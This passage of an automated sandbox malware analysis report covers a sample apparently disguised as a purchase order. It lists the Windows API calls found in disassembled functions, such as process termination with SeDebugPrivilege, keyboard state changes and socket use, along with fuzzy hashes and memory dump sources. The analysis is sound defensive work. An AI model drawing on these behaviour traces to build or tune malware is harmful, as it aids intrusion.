                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1268354404-0
                                                                                                              • Opcode ID: 69934ec1ba5605bbe194facb50a9ec2ab66629c0e7d9180221a81010ebea1745
                                                                                                              • Instruction ID: f45263290d22cb94dd44cd370de89b1252c6d8441b0c746a444a504df99ba225
                                                                                                              • Opcode Fuzzy Hash: 69934ec1ba5605bbe194facb50a9ec2ab66629c0e7d9180221a81010ebea1745
                                                                                                              • Instruction Fuzzy Hash: 75519EB0A00609EFDB21DF65CC81FAA77B9AF08350F100129FA0AD76A1D7B4EC84DB55
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00425FA6,?), ref: 00426ED8
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00425FA6,?), ref: 00426EF1
                                                                                                                • Part of subcall function 004272CB: GetFileAttributesW.KERNEL32(?,00426019), ref: 004272CC
                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004275CA
                                                                                                              • _wcscmp.LIBCMT ref: 004275E2
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004275FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 793581249-0
                                                                                                              • Opcode ID: 8b11652b902d31fef82c5ae7038f019d8915692ea9ca82cfad2e556d8f17411c
                                                                                                              • Instruction ID: 815b660f7d943b3b8f915b2fe7193446d70f815b7183336a7775588683d1ef81
                                                                                                              • Opcode Fuzzy Hash: 8b11652b902d31fef82c5ae7038f019d8915692ea9ca82cfad2e556d8f17411c
                                                                                                              • Instruction Fuzzy Hash: DF5153B2A092299ADF54EB54E8419DE73BCAF08314F4040EFF605E3541EA7896C5CB68
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 003FEAEB
                                                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 003FEB32
                                                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 0045DC86
                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 0045DCF2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ShowWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1268545403-0
                                                                                                              • Opcode ID: 164f16746fa7656178dd821b5b2176fe23965cf2113da679314d95729d3a267e
                                                                                                              • Instruction ID: c7508e65d4c12116d74b9e911688ccd521c0c5077f80911664ab6435d0c003b6
                                                                                                              • Opcode Fuzzy Hash: 164f16746fa7656178dd821b5b2176fe23965cf2113da679314d95729d3a267e
                                                                                                              • Instruction Fuzzy Hash: C9410A70B0D284DBD7374B288D8DA3A7A99BF51306F1A041EE34786A71D6B47C44D316
                                                                                                              APIs
                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0041AEF1,00000B00,?,?), ref: 0041B26C
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0041AEF1,00000B00,?,?), ref: 0041B273
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0041AEF1,00000B00,?,?), ref: 0041B288
                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0041AEF1,00000B00,?,?), ref: 0041B290
                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0041AEF1,00000B00,?,?), ref: 0041B293
                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0041AEF1,00000B00,?,?), ref: 0041B2A3
                                                                                                              • GetCurrentProcess.KERNEL32(0041AEF1,00000000,?,0041AEF1,00000B00,?,?), ref: 0041B2AB
                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0041AEF1,00000B00,?,?), ref: 0041B2AE
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0041B2D4,00000000,00000000,00000000), ref: 0041B2C8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1957940570-0
                                                                                                              • Opcode ID: 05e98fcf7047fc7fe3107fc4f25f583e2cbfbc308220c9b43f0debe1a5d9f70a
                                                                                                              • Instruction ID: eddb91b5be683bb03e36069d7e3bb973100c5104480ae0dfc3d85cb42ef1261c
                                                                                                              • Opcode Fuzzy Hash: 05e98fcf7047fc7fe3107fc4f25f583e2cbfbc308220c9b43f0debe1a5d9f70a
                                                                                                              • Instruction Fuzzy Hash: 3901AC75B40344BFE610ABA5DC49F5B7BACEB89711F014421FA05DB291D6B498408B66
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                              • API String ID: 0-572801152
                                                                                                              • Opcode ID: 6535e81023625ba3c374dee4ad2da242a514ce1528565a91bc7e132efb270045
                                                                                                              • Instruction ID: 69af0c33f7172408576b43de5826d07bc06b9e2a49fdcf099e53f3e12ab5e189
                                                                                                              • Opcode Fuzzy Hash: 6535e81023625ba3c374dee4ad2da242a514ce1528565a91bc7e132efb270045
                                                                                                              • Instruction Fuzzy Hash: 8EE1B171A0021AABDF14DFA4D881AAE77B5EF4C354F14902AE905BB381D778AD41CB98
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                                • Part of subcall function 003FC6F4: _wcscpy.LIBCMT ref: 003FC717
                                                                                                              • _wcstok.LIBCMT ref: 0043184E
                                                                                                              • _wcscpy.LIBCMT ref: 004318DD
                                                                                                              • _memset.LIBCMT ref: 00431910
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                              • String ID: X$p2Il2I
                                                                                                              • API String ID: 774024439-1299268612
                                                                                                              • Opcode ID: 04a072d6f2dfd7c3c4e82dcb2c166011d47ff8b72fdc52241b050f3040b1ee8d
                                                                                                              • Instruction ID: 5ff0934083dbfc7aa4dc64e8afa14d690c996a2489822b053b5dc946fdaef99a
                                                                                                              • Opcode Fuzzy Hash: 04a072d6f2dfd7c3c4e82dcb2c166011d47ff8b72fdc52241b050f3040b1ee8d
                                                                                                              • Instruction Fuzzy Hash: D9C1A0355043909FC715EF25C981A9FB7E0BF89354F004A2EF9899B2A2DB74EC05CB86
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: Q\E$[$\$\$]$^
                                                                                                              • API String ID: 2102423945-1026548749
                                                                                                              • Opcode ID: c8a35f5500cd3bd5c0209e4b47dc22a456198a88aa16ff1b7df849e00449b019
                                                                                                              • Instruction ID: 51407756523ca2cc0dad19be72b80e9c414215c8ed826d354f94529c8cde65f0
                                                                                                              • Opcode Fuzzy Hash: c8a35f5500cd3bd5c0209e4b47dc22a456198a88aa16ff1b7df849e00449b019
                                                                                                              • Instruction Fuzzy Hash: 4151B171D002699BCF25CF99C8817AEB7B2FF94304F258266D818B7391E7309D89CB85
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00449B19
                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00449B2D
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00449B47
                                                                                                              • _wcscat.LIBCMT ref: 00449BA2
                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00449BB9
                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00449BE7
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                              • String ID: SysListView32
                                                                                                              • API String ID: 307300125-78025650
                                                                                                              • Opcode ID: 4b87daf9520bfc55ab737e76002bc8a9198ddb8ddf9516c079179636662ed7b0
                                                                                                              • Instruction ID: 198cd40979afdc356572d80ac50e41dd021e236f5eb9c9214535684b1619e4f3
                                                                                                              • Opcode Fuzzy Hash: 4b87daf9520bfc55ab737e76002bc8a9198ddb8ddf9516c079179636662ed7b0
                                                                                                              • Instruction Fuzzy Hash: F341B070A40348AFEB219FA4CC85BEB77A8EF08350F10442BF545A7291D7B99D85DB68
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00426554
                                                                                                                • Part of subcall function 00426532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00426564
                                                                                                                • Part of subcall function 00426532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004265F9
                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0044179A
                                                                                                              • GetLastError.KERNEL32 ref: 004417AD
                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004417D9
                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00441855
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00441860
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00441895
                                                                                                              Similarity
                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                              • String ID: SeDebugPrivilege
                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                              • Opcode ID: d0ea693d4a04dd13b02a35b5868f3c3003dabc7e32b89601e297f2a47c9f6bd2
                                                                                                              • Instruction ID: ad1668acd269fb7107bd9d3ab076bdf499156c55ef6654b30a650b872a03c237
                                                                                                              • Opcode Fuzzy Hash: d0ea693d4a04dd13b02a35b5868f3c3003dabc7e32b89601e297f2a47c9f6bd2
                                                                                                              • Instruction Fuzzy Hash: 7741B271700200AFDB05EF55C9D5F6E77A1AF44304F05805AFA069F3E2DBB899408B59
                                                                                                              APIs
                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 004258B8
                                                                                                              Similarity
                                                                                                              • API ID: IconLoad
                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                              • API String ID: 2457776203-404129466
                                                                                                              • Opcode ID: 4be94b1bdea08e9d4ff8f14add8906db09e372693e8f65878bae01dcc81c1123
                                                                                                              • Instruction ID: fc8ebaa51400b06b1de792dd681bd28f18b194fa920d6c5854b2b12782ea1c1b
                                                                                                              • Opcode Fuzzy Hash: 4be94b1bdea08e9d4ff8f14add8906db09e372693e8f65878bae01dcc81c1123
                                                                                                              • Instruction Fuzzy Hash: 7F11083570D752BAEB107A55AC82E6B279C9F27314F60003BF500E62C1E7FCAE11426D
                                                                                                              APIs
                                                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0042A806
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafeVartype
                                                                                                              • String ID:
                                                                                                              • API String ID: 1725837607-0
                                                                                                              • Opcode ID: e6e61600f56211bb4e635e3c2ab9741e375ae09c36e72295c73f4997dbff574b
                                                                                                              • Instruction ID: ea69ae85ef39940e828136744fb67659002ee9994ccb3a4fe17d1f0eca2c8410
                                                                                                              • Opcode Fuzzy Hash: e6e61600f56211bb4e635e3c2ab9741e375ae09c36e72295c73f4997dbff574b
                                                                                                              • Instruction Fuzzy Hash: FDC18175A0022ADFDB00DF94E481BAEB7F4FF08315F24446AEA05E7341D738A955CB9A
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00426B63
                                                                                                              • LoadStringW.USER32(00000000), ref: 00426B6A
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00426B80
                                                                                                              • LoadStringW.USER32(00000000), ref: 00426B87
                                                                                                              • _wprintf.LIBCMT ref: 00426BAD
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00426BCB
                                                                                                              Strings
                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00426BA8
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                              • Opcode ID: 5aee370ceb8e7dedb131cd90b0f663a156765d9a99b2b65d359c956e1ad61cf7
                                                                                                              • Instruction ID: 4246998158fa121ba60c8d3c7fd328aa933d60bb831aad8be39c4de1538d25f6
                                                                                                              • Opcode Fuzzy Hash: 5aee370ceb8e7dedb131cd90b0f663a156765d9a99b2b65d359c956e1ad61cf7
                                                                                                              • Instruction Fuzzy Hash: 440117F6E002587FE711A7949D89EE7766CD704304F4045A6F746E2041EAB49E844B79
                                                                                                              APIs
                                                                                                                • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00442BF6
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharConnectRegistryUpper
                                                                                                              • String ID:
                                                                                                              • API String ID: 2595220575-0
                                                                                                              • Opcode ID: 141fba354ed2cf796e9f381b08e1c51c20eadb5a209a28467456a499135b6fbb
                                                                                                              • Instruction ID: 99ed2ffc9516c3b68fd502c688236f44146d94d519d2e0e1982f3162b7b2bfb6
                                                                                                              • Opcode Fuzzy Hash: 141fba354ed2cf796e9f381b08e1c51c20eadb5a209a28467456a499135b6fbb
                                                                                                              • Instruction Fuzzy Hash: 1E91CE716042019FD701EF15C981B6EB7E5FF88314F44881EF9969B2A2DBB8E905CB4A
                                                                                                              APIs
                                                                                                              • select.WSOCK32 ref: 00439691
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0043969E
                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004396C8
                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004396E9
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004396F8
                                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 004397AA
                                                                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0047DC00), ref: 00439765
                                                                                                                • Part of subcall function 0041D2FF: _strlen.LIBCMT ref: 0041D309
                                                                                                              • _strlen.LIBCMT ref: 00439800
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 3480843537-0
                                                                                                              • Opcode ID: 1c4f47ab1c81ba47ffbd4ce0323c0a961e0204be91bc61015c477e44e33d3ef4
                                                                                                              • Instruction ID: 18f29bf43a2ad2862add212b4e7773552f51aade24c8d638af1fd76f3a3f2740
                                                                                                              • Opcode Fuzzy Hash: 1c4f47ab1c81ba47ffbd4ce0323c0a961e0204be91bc61015c477e44e33d3ef4
                                                                                                              • Instruction Fuzzy Hash: AA810D31504240ABC315EF65CC82E6FB7A8EF88714F004A2EF6559B2E1EBB0DD01CB96
APIs
• __mtinitlocknum.LIBCMT ref: 0040A991
  • Part of subcall function 00407D7C: __FF_MSGBANNER.LIBCMT ref: 00407D91
  • Part of subcall function 00407D7C: __NMSG_WRITE.LIBCMT ref: 00407D98
  • Part of subcall function 00407D7C: __malloc_crt.LIBCMT ref: 00407DB8
• __lock.LIBCMT ref: 0040A9A4
• __lock.LIBCMT ref: 0040A9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00496DE0,00000018,00415E7B,?,00000000,00000109), ref: 0040AA0C
• EnterCriticalSection.KERNEL32(8000000C,00496DE0,00000018,00415E7B,?,00000000,00000109), ref: 0040AA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 0040AA39
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: 2ba090b8c7a18345a08bb690e83a880091446c60ec730c5a404c80179b9b3718
• Instruction ID: bb613424b85b54d83f231774b72021fc063f6c76e149a20dc81cecc59b9b4f60
• Opcode Fuzzy Hash: 2ba090b8c7a18345a08bb690e83a880091446c60ec730c5a404c80179b9b3718
• Instruction Fuzzy Hash: 524105B1F003019BEB149F69DA4475ABBA0AF41324F10823EE425BB2D1D77C9861CF9E
APIs
• DeleteObject.GDI32(00000000), ref: 00448EE4
• GetDC.USER32(00000000), ref: 00448EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00448EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00448F03
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00448F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00448F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0044BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00448F8A
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00448FAA
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 3aa44203315e41f1f4a724a6124709c66331b48212523204849b8aee8a2b0efa
• Instruction ID: 9e05e1c7ad9c697b0fd3107868a661ac32e1779f974be3c1318ed7eea0f69fae
• Opcode Fuzzy Hash: 3aa44203315e41f1f4a724a6124709c66331b48212523204849b8aee8a2b0efa
• Instruction Fuzzy Hash: D7318E72A00214BFEB108F54CC4AFEB3BADEF49715F044065FE09DA291DAB99841CB79
APIs
  • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
• GetSystemMetrics.USER32(0000000F), ref: 0045016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0045038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004503AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 004503D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004503FF
• ShowWindow.USER32(00000003,00000000), ref: 00450421
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00450440
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 3356174886-0
• Opcode ID: 872034edc7d900d334790125ca1616a520f99a9157d1f941ab8fa96e59527238
• Instruction ID: fb6d9a2b0c040ad8ca6965139b350eea3b4c23193a48c9f94b018c22093f68e3
• Opcode Fuzzy Hash: 872034edc7d900d334790125ca1616a520f99a9157d1f941ab8fa96e59527238
• Instruction Fuzzy Hash: 15A1F338A00616EFDB18CF68C9857BEBBB1FF04742F088166EC5497251D778AD54CB94
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 829912e6f01f1baf506f7472922527dfa9d7fa8498d9563085a2101b9368ce6a
• Instruction ID: f0b7d397050275b13d607e40414df84e069ed0caffc38c763a379fe5a7b196b8
• Opcode Fuzzy Hash: 829912e6f01f1baf506f7472922527dfa9d7fa8498d9563085a2101b9368ce6a
• Instruction Fuzzy Hash: DB718DB1900609EFCB05CF98CC89ABEBB78FF85314F148159FA19AB251C734AA51CF65
APIs
• _memset.LIBCMT ref: 0044225A
• _memset.LIBCMT ref: 00442323
• ShellExecuteExW.SHELL32(?), ref: 00442368
  • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
  • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
  • Part of subcall function 003FC6F4: _wcscpy.LIBCMT ref: 003FC717
• CloseHandle.KERNEL32(00000000), ref: 0044242F
• FreeLibrary.KERNEL32(00000000), ref: 0044243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: 25a8ae4a3fe90f7be1c66e0b72379d08625883b6e72bee0f0016177889af6153
• Instruction ID: 11298f79b7bb6c5b5a0d6d197f08bc7de83acf9ca9690253026baa7a25185f70
• Opcode Fuzzy Hash: 25a8ae4a3fe90f7be1c66e0b72379d08625883b6e72bee0f0016177889af6153
• Instruction Fuzzy Hash: 56719F74A006299FDF05EFA5C5819AEB7F5FF48310F10855AE845AB391CB74AD40CB94
APIs
• GetParent.USER32(?), ref: 00423DE7
• GetKeyboardState.USER32(?), ref: 00423DFC
• SetKeyboardState.USER32(?), ref: 00423E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00423E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00423EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00423EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00423F13
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
